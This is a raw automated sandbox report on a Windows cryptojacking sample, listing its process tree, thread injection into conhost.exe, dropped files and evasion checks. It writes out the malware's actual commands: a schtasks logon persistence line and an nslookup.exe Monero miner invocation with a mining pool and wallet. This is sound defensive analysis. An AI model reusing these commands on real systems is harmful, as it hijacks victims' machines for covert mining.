Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='nslookup.exe'

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\boooba.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: boooba.exe

ReversingLabs: Detection: 71%

Source: nslookup.exe	String found in binary or memory: id-cmc-addExtensions
Source: nslookup.exe	String found in binary or memory: set-addPolicy
Source: nslookup.exe	String found in binary or memory: id-cmc-addExtensions
Source: nslookup.exe	String found in binary or memory: set-addPolicy

Source: unknown	Process created: C:\Users\user\Desktop\boooba.exe "C:\Users\user\Desktop\boooba.exe"
Source: C:\Users\user\Desktop\boooba.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Source: unknown	Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Users\user\Desktop\boooba.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior

Source: C:\Users\user\Desktop\boooba.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: boooba.exe

Static file information: File size 2234368 > 1048576

Source: boooba.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x21fc00

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

Jump to behavior

Drops PE files

Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys	Jump to dropped file
Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\IOAshdohSha.exe	Jump to dropped file
Source: C:\Windows\System32\conhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\IOAshdohSha.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\IOAshdohSha.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"

Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\nslookup.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Windows\System32\nslookup.exe	System information queried: FirmwareTableInformation			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: nslookup.exe, 0000000D.00000002.2902391217.0000019A4A588000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\conhost.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

Jump to dropped file

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\boooba.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 15759250000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 13CA14E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1E311770000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 29965300000 protect: page execute and read and write	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\boooba.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 59250000	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Thread created: C:\Windows\System32\conhost.exe EIP: A14E0000	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 11770000	Jump to behavior
